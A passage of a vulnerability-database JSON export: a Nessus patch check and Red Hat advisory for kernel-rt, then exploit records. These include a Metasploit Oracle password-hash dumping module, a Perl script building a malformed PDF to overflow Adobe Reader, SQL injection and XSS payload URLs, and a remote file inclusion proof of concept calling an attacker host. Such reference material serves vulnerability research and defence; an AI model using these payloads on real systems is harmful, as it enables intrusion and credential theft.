script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-rt-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:mrg-rt-release\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2012/06/13\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/07/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2012-2375\", \"CVE-2012-4530\", \"CVE-2013-1772\", \"CVE-2013-1773\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2013:0566\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0566\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n\n if (! (rpm_exists(release:\"RHEL6\", rpm:\"mrg-release\"))) audit(AUDIT_PACKAGE_NOT_INSTALLED, \"MRG\");\n\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-debuginfo-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debug-devel-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-debuginfo-common-x86_64-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-devel-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-doc-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"kernel-rt-firmware-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-debuginfo-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-trace-devel-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-debuginfo-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", cpu:\"x86_64\", reference:\"kernel-rt-vanilla-devel-3.6.11-rt28.20.el6rt\")) flag++;\n if (rpm_check(release:\"RHEL6\", reference:\"mrg-rt-release-3.6.11-rt28.20.el6rt\")) flag++;\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-rt / kernel-rt-debug / kernel-rt-debug-debuginfo / etc\");\n }\n}\n", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "redhat": [{"lastseen": "2019-08-13T18:44:39", "bulletinFamily": "unix", "description": "The kernel-rt packages contain the Linux kernel, the core of any Linux\noperating system.\n\nThis update fixes the following security issues:\n\n* A buffer overflow flaw was found in the way UTF-8 characters were\nconverted to UTF-16 in the utf8s_to_utf16s() function of the Linux kernel's\nFAT file system implementation. A local user able to mount a FAT file\nsystem with the \"utf8=1\" option could use this flaw to crash the system or,\npotentially, to escalate their privileges. (CVE-2013-1773, Important)\n\n* It was found that the RHSA-2012:0333 update did not correctly fix the\nCVE-2011-4131 issue. A malicious Network File System version 4 (NFSv4)\nserver could return a crafted reply to a GETACL request, causing a denial\nof service on the client. (CVE-2012-2375, Moderate)\n\n* A memory disclosure flaw was found in the way the load_script() function\nin the binfmt_script binary format handler handled excessive recursions. A\nlocal, unprivileged user could use this flaw to leak kernel stack memory to\nuser-space by executing specially-crafted scripts. (CVE-2012-4530, Low)\n\n* A flaw was found in the way file permission checks for the \"/dev/kmsg\"\nfile were performed in restricted root environments (for example, when\nusing a capability-based security model). A local user able to write to\nthis file could cause a denial of service. (CVE-2013-1772, Low)\n\nThe CVE-2012-2375 issue was discovered by Jian Li of Red Hat.\n\nThis update also fixes multiple bugs. Documentation for these changes will\nbe available shortly from the Technical Notes document linked to in the\nReferences section.\n\nUsers should upgrade to these updated packages, which upgrade the kernel-rt\nkernel to version kernel-rt-3.6.11-rt28, correct these issues, and fix the\nbugs noted in the Red Hat Enterprise MRG 2 Technical Notes. The system must\nbe rebooted for this update to take effect.\n", "modified": "2018-06-07T08:58:29", "published": "2013-03-06T05:00:00", "id": "RHSA-2013:0566", "href": "https://access.redhat.com/errata/RHSA-2013:0566", "type": "redhat", "title": "(RHSA-2013:0566) Important: kernel-rt security and bug fix update", "cvss": {"score": 6.2, "vector": "AV:L/AC:H/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2019-09-17T08:03:46", "bulletinFamily": "exploit", "description": "This module dumps the usernames and password hashes from Oracle given the proper Credentials and SID. These are then stored as creds for later cracking using auxiliary/analyze/jtr_oracle_fast. This module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\n", "modified": "2019-03-28T14:06:56", "published": "2011-10-18T00:54:05", "id": "MSF:AUXILIARY/SCANNER/ORACLE/ORACLE_HASHDUMP", "href": "", "type": "metasploit", "title": "Oracle Password Hashdump", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::ORACLE\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Oracle Password Hashdump',\n 'Description' => %Q{\n This module dumps the usernames and password hashes\n from Oracle given the proper Credentials and SID.\n These are then stored as creds for later cracking using auxiliary/analyze/jtr_oracle_fast.\n This module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\n },\n 'Author' => ['theLightCosine'],\n 'License' => MSF_LICENSE\n )\n end\n\n def run_host(ip)\n return if not check_dependencies\n\n # Checks for Version of Oracle. Behavior varies with oracle version.\n # 12c uses SHA-512 (explained in more detail in report_hashes() below)\n # 11g uses SHA-1 while 8i-10g use DES\n query = 'select * from v$version'\n ver = prepare_exec(query)\n\n if ver.nil?\n print_error(\"An error has occurred while querying for the Oracle version. Please check your OPTIONS\")\n return\n end\n\n unless ver.empty?\n case\n when ver[0].include?('8i')\n ver='8i'\n when ver[0].include?('9i')\n ver='9i'\n when ver[0].include?('10g')\n ver='10g'\n when ver[0].include?('11g')\n ver='11g'\n when ver[0].include?('12c')\n ver='12c'\n when ver[0].include?('18c')\n print_error(\"Version 18c is not currently supported\")\n return\n else\n print_error(\"Error: Oracle DB version not supported.\\nThis module supports Oracle DB versions 8i, 9i, 10g, 11g, and 12c.\\nDumping unsupported version info:\\n#{ver[0]}\")\n return\n end\n vprint_status(\"Server is running version #{ver}\")\n end\n\n this_service = report_service(\n :host => datastore['RHOST'],\n :port => datastore['RPORT'],\n :name => 'oracle',\n :proto => 'tcp'\n )\n\n tbl = Rex::Text::Table.new(\n 'Header' => 'Oracle Server Hashes',\n 'Indent' => 1,\n 'Columns' => ['Username', 'Hash']\n )\n\n begin\n case ver\n when '8i', '9i', '10g' # Get the usernames and hashes for 8i-10g\n query='SELECT name, password FROM sys.user$ where password is not null and name<> \\'ANONYMOUS\\''\n results= prepare_exec(query)\n unless results.empty?\n results.each do |result|\n row= result.split(/,/)\n tbl << row\n end\n end\n when '11g', '12c' # Get the usernames and hashes for 11g or 12c\n query='SELECT name, spare4 FROM sys.user$ where password is not null and name<> \\'ANONYMOUS\\''\n results= prepare_exec(query)\n #print_status(\"Results: #{results.inspect}\")\n unless results.empty?\n results.each do |result|\n row= result.split(/,/)\n next unless row.length == 2\n tbl << row\n end\n end\n end\n rescue => e\n print_error(\"An error occurred. The supplied credentials may not have proper privileges\")\n return\n end\n print_status(\"Hash table :\\n #{tbl}\")\n report_hashes(tbl, ver, ip, this_service)\n end\n\n # Save each row in the hash table as credentials (shown by \"creds\" command)\n # This is done slightly differently, depending on the version\n def report_hashes(table, ver, ip, service)\n\n # Before module jtr_oracle_fast cracks these hashes, they are converted (based on jtr_format)\n # to a format that John The Ripper can handle. This format is stored here.\n case ver\n when '8i', '10g'\n jtr_format = \"des,oracle\"\n when '11g'\n jtr_format = \"raw-sha1,oracle11\"\n when '12c'\n jtr_format = \"oracle12c\"\n end\n\n service_data = {\n address: Rex::Socket.getaddress(ip),\n port: service[:port],\n protocol: service[:proto],\n service_name: service[:name],\n workspace_id: myworkspace_id\n }\n\n # For each row in the hash table, save its corresponding credential data and JTR format\n table.rows.each do |row|\n credential_data = {\n origin_type: :service,\n module_fullname: self.fullname,\n username: row[0],\n private_data: row[1],\n private_type: :nonreplayable_hash,\n jtr_format: jtr_format\n }\n\n credential_core = create_credential(credential_data.merge(service_data))\n\n login_data = {\n core: credential_core,\n status: Metasploit::Model::Login::Status::UNTRIED\n }\n\n create_credential_login(login_data.merge(service_data))\n end\n print_good(\"Hash Table has been saved\")\n end\n\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/oracle/oracle_hashdump.rb"}], "zdt": [{"lastseen": "2018-04-02T03:22:41", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category dos / poc", "modified": "2009-02-23T00:00:00", "published": "2009-02-23T00:00:00", "id": "1337DAY-ID-6759", "href": "https://0day.today/exploit/description/6759", "type": "zdt", "title": "Adobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day", "sourceData": "============================================================\r\nAdobe Acrobat Reader JBIG2 Local Buffer Overflow PoC #2 0day\r\n============================================================\r\n\r\n\r\n\r\n\r\n\r\n#!/usr/bin/perl\r\n# k`sOSe 02/22/2009\r\n\r\n# http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.html\r\n\r\nmy $size = \"\\x40\\x00\";\r\nmy $factor = \"ABCD\";\r\nmy $data = \"A\" x 8314;\r\n\r\n\r\nprint pdf();\r\n\r\nsub pdf() \r\n{\r\n\r\n\"%PDF-1.5\\n\" .\r\n\"%\\xec\\xf5\\xf2\\xe1\\xe4\\xef\\xe3\\xf5\\xed\\xe5\\xee\\xf4\\n\" .\r\n\"3 0 \\n\" .\r\n\"xref\\n\" .\r\n\"3 16\\n\" .\r\n\"0000000023 00000 n \\n\" .\r\n\"0000000584 00000 n \\n\" .\r\n\"0000000865 00000 n \\n\" .\r\n\"0000001035 00000 n \\n\" .\r\n\"0000001158 00000 n \\n\" .\r\n\"0000001287 00000 n \\n\" . \r\n\"0000001338 00000 n \\n\" .\r\n\"0000001384 00000 n \\n\" .\r\n\"0000002861 00000 n \\n\" .\r\n\"0000003637 00000 n \\n\" .\r\n\"0000005126 00000 n \\n\" .\r\n\"0000005173 00000 n \\n\" .\r\n\"0000005317 00000 n \\n\" .\r\n\"0000005370 00000 n \\n\" .\r\n\"0000005504 00000 n \\n\" .\r\n\"0000000714 00000 n \\n\" .\r\n\"trailer\\n\" .\r\n\"<</Root 4 0 R/Info 2 0 R/ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 19/Prev 10218>>\\n\" .\r\n\"startxref\\n\" .\r\n\"0\\n\" .\r\n\"%%EOF\\n\" .\r\n\" \\n\" .\r\n\"4 0 obj\\n\" .\r\n\"<</Type/Catalog/Pages 1 0 R/OCProperties<</OCGs[9 0 R 13 0 R]/D<</Order[9 0 R 13 0 R]/ON[9 0 R 13 0 R]/OFF[]>>>>>>\\n\" .\r\n\"endobj\\n\" .\r\n\" \\n\" .\r\n\"5 0 obj\\n\" .\r\n\"<</Type/Page/MediaBox[0 0 640 480]/Resources<</XObject<</Im001 7 0 R/Im002 10 0 R/Im003 11 0 R/Im004 14 0 R/Im005 16 0 R>>>>/Contents 6 0 R/Parent 1 0 R>>\\n\" .\r\n\"endobj\\n\" .\r\n\"6 0 obj\\n\" .\r\n\"<</Length 56/Filter/FlateDecode>>\\n\" .\r\n\"stream\\n\" .\r\n\"x\\x9c\\xe3*T031P\\x00A\\x13\\x0b\\x08\\x9d\\x9c\\xab\\xa0\\xef\\x99k``\\xa8\\xe0\\x92\\xaf\\x10\\xc8\\x85[\\x81\\x11!\\x05\\xc6\\x84\\x14\\x98\\xc0\\x14\\xc0\\$\\@\\xb4\\x05\\xb2\\n\" .\r\n\"S\\xb0\\n\" .\r\n\"\\x00J\\x15#,\\n\" .\r\n\"endstream\\n\" .\r\n\"endobj\\n\" .\r\n\r\n\"12 0 obj\\n\" .\r\n\"<</Subtype/Image/Width 640/Height 480/ColorSpace/DeviceGray/BitsPerComponent 1/Decode[1 0]/Interpolate true/Length 1314/Filter/JBIG2Decode>>\\n\" .\r\n\"stream\\n\" .\r\n\"\\x00\\x00\\x00\\x01\" . $size . $factor . \"\\x13\" . $data . \"endstream\\n\" .\r\n\"endobj\\n\" .\r\n\"13 0 obj\\n\" .\r\n\"<</Type/OCG/Name(Text Color)>>\\n\" .\r\n\"endobj\\n\" .\r\n\"14 0 obj\\n\" .\r\n\"<</Subtype/Image/Width 1/Height 1/ColorSpace/DeviceGray/BitsPerComponent 8/SMask 12 0 R/OC 15 0 R/Length 1>>\\n\" .\r\n\"stream\\n\" .\r\n\"\\x00\\n\" .\r\n\"endstream\\n\" .\r\n\"endobj\\n\" .\r\n\r\n\"1 0 obj\\n\" .\r\n\"<</Type/Pages/Kids[5 0 R]/Count 1>>\\n\" .\r\n\"endobj\\n\" .\r\n\"xref\\n\" . \r\n\"0 3\\n\" . \r\n\"0000000000 65535 f \\n\" .\r\n\"0000009988 00000 n \\n\" .\r\n\"0000010039 00000 n \\n\" .\r\n\"trailer\\n\" .\r\n\"<</ID[<AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA> <AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>]/Size 3>>\\n\" .\r\n\"startxref\\n\" .\r\n\"104\\n\" .\r\n\"%%EOF\\n\";\r\n\r\n}\r\n\r\n\r\n\n# 0day.today [2018-04-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/6759"}, {"lastseen": "2018-01-05T11:02:58", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-11-06T00:00:00", "published": "2008-11-06T00:00:00", "id": "1337DAY-ID-4102", "href": "https://0day.today/exploit/description/4102", "type": "zdt", "title": "Prozilla Software Directory (XSS/SQL) Multiple Vulnerabilities", "sourceData": "==============================================================\r\nProzilla Software Directory (XSS/SQL) Multiple Vulnerabilities\r\n==============================================================\r\n\r\n\r\n==============================================================================\r\n\tSoftware Directory v1.0 (SQL/XSS) Remote SQL Vulnerability\r\n==============================================================================\r\n\r\n\t[\u00c2\u00bb] Script: [ Software Directory v1.0 ]\r\n\t[\u00c2\u00bb] Language: [ PHP ]\r\n\t[\u00c2\u00bb] Type: [ Commercial ]\r\n\t[\u00c2\u00bb] Report-Date: [ 06.11.2008 ]\r\n\t[\u00c2\u00bb] Founder: [ G4N0K ]\r\n\r\n\r\n===[ XPL ]===\r\n\r\n\t[ SQLi ]\r\n\t[\u00c2\u00bb] http://localhost/[path]/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5--\r\n\r\n\r\n\t[ XSS ]\r\n\t[\u00c2\u00bb] http://localhost/[path]/signinform.php?msg=\"><script>alert(document.cookie)</script>\r\n\r\n\r\n\r\n\r\n===[ LIVE ]===\r\n\t\r\n\t[ SQLi ]\r\n\t[\u00c2\u00bb] http://demo.turnkeyforms.com/software-directory/showcategory.php?cid=-24/**/UNION/**/ALL/**/SELECT/**/1,concat(version(),0x3a,user()),3,4,5--\r\n\r\n\t[ XSS ]\r\n\t[\u00c2\u00bb] http://demo.turnkeyforms.com/software-directory/signinform.php?msg=\"><script>alert(document.cookie)</script>\r\n\r\n\t\r\n===[ Greetz ]===\r\n\r\n\t[\u00c2\u00bb] ALLAH\r\n\t[\u00c2\u00bb] Tornado2800 \r\n\t[\u00c2\u00bb] Hussain-X \r\n\r\n\t//Are ya looking for something that has not BUGz at all...!? I know it... It's The Holy Quran. [:-)\r\n\t//ALLAH,forgimme...\r\n\r\n===============================================================================\r\nexit(); //EoX\r\n===============================================================================\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4102"}, {"lastseen": "2018-04-09T16:54:17", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2007-03-13T00:00:00", "published": "2007-03-13T00:00:00", "id": "1337DAY-ID-1584", "href": "https://0day.today/exploit/description/1584", "type": "zdt", "title": "WebCreator <= 0.2.6-rc3 (moddir) Remote File Inclusion Vulnerability", "sourceData": "====================================================================\r\nWebCreator <= 0.2.6-rc3 (moddir) Remote File Inclusion Vulnerability\r\n====================================================================\r\n\r\n\r\n\r\n____________________ ___ ___ ________\r\n\\_ _____/\\_ ___ \\ / | \\\\_____ \\\r\n | __)_ / \\ \\// ~ \\/ | \\\r\n | \\\\ \\___\\ Y / | \\\r\n/_______ / \\______ /\\___|_ /\\_______ /\r\n \\/ \\/ \\/ \\/ .OR.ID\r\nECHO_ADV_74$2007\r\n\r\n-------------------------------------------------------------------------------------\r\n[ECHO_ADV_74$2007] WebCreator <= 0.2.6-rc3 (moddir) Remote File Inclusion Vulnerability\r\n-------------------------------------- ----------------------------------------------\r\n\r\nAuthor\t\t: Dedi Dwianto a.k.a the_day\r\nDate Found\t: March, 13th 2007\r\nLocation\t: Indonesia, Jakarta\r\nCritical Lvl\t: Highly critical\r\nImpact\t\t: System access\r\nWhere\t\t: From Remote\r\n---------------------------------------------------------------------------\r\n\r\nAffected software description:\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~\r\n\r\nApplication\t: WebCreator\r\nversion\t\t: <= 0.2.6-rc3\r\nURL\t\t: http://webcreator.innoxia.cz/\r\n\r\n---------------------------------------------------------------------------\r\n\r\nVulnerability:\r\n~~~~~~~~~~~~\r\n\r\n- Invalid include_once function at mods/content/load.inc.php\r\n-----------------------mods/content/load.inc.php------------\r\n\r\n<?\r\n include_once($moddir . '/functions.lib.php');\r\n?>\r\n\r\n----------------------------------------------------------\r\n\r\nInput passed to the \"$moddir\" parameter in load.inc.php is not\r\nproperly verified before being used. This can be exploited to execute\r\narbitrary PHP code by including files from local or external\r\nresources.\r\n\r\nalso affected files :\r\n\r\nconfig/load.inc.php\r\nhttp/load.inc.php\r\n\r\nand More ....\r\n\r\n\r\n\r\nProof Of Concept:\r\n~~~~~~~~~~~~~\r\n\r\nhttp://localhost/mods/config/load.inc.php?moddir=http://atacker.com/inject.txt?\r\nhttp://localhost/mods/http/load.inc.php?moddir=http://atacker.com/inject.txt?\r\n\r\n\r\nSolution:\r\n~~~~~\r\n\r\n- Sanitize variable $moddir affected files.\r\n- Turn off register_globals\r\n\r\n---------------------------------------------------------------------------\r\n\r\nShoutz:\r\n~\r\n~ y3dips,moby,comex,z3r0byt3,K-159,c-a-s-e,S`to,lirva32,anonymous\r\n~ Jessy Nice Girl\r\n~ az001,bomm_3x,matdhule,angelia\r\n\r\n \r\n-------------------------------- [ EOF ]----------------------------------\r\n\r\n\r\n\r\n\n# 0day.today [2018-04-09] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/1584"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:18", "bulletinFamily": "software", "description": "Integer overflow in signed/unsigned conversion during .doc file parsing.", "modified": "2005-04-13T00:00:00", "published": "2005-04-13T00:00:00", "id": "SECURITYVULNS:VULN:4074", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:4074", "title": "Microsoft Word integer overflow", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}